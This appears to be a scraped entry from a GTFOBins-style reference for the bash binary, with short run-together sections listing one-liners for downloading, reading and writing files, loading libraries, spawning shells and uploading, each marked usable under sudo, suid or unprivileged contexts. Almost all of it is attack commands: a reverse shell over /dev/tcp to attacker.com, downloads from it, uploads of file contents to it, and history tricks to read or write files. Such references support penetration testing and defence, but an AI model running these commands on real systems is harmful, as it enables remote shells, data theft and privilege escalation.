bash
Download
Context: sudo, suid, unprivileged
bash -c '{ echo -ne "GET /path/to/input-file HTTP/1.0\r\nhost: attacker.com\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/attacker.com/12345 \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } >/path/to/output-file'Context: sudo, suid, unprivileged
bash -c 'echo "$(</dev/tcp/attacker.com/12345) >/path/to/output-file'File Read
Context: sudo, suid, unprivileged
bash -c 'echo "$(</path/to/input-file)"'Context: sudo, suid, unprivileged
HISTTIMEFORMAT=$'\r\e[K'
history -c
history -r /path/to/input-file
historyFile Write
Context: sudo, suid, unprivileged
bash -c 'echo DATA >/path/to/output-file'Context: sudo, suid, unprivileged
HISTIGNORE='history *'
history -c
DATA
history -w /path/to/output-fileLibrary Load
Context: sudo, suid, unprivileged
bash -c 'enable -f /path/to/lib.so x'Reverse Shell
Context: sudo, suid, unprivileged
bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'Shell
Context: sudo, suid, unprivileged
bashUpload
Context: sudo, suid, unprivileged
bash -c 'echo -e "POST / HTTP/0.9\n\n$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'Context: sudo, suid, unprivileged
bash -c 'echo -n "$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'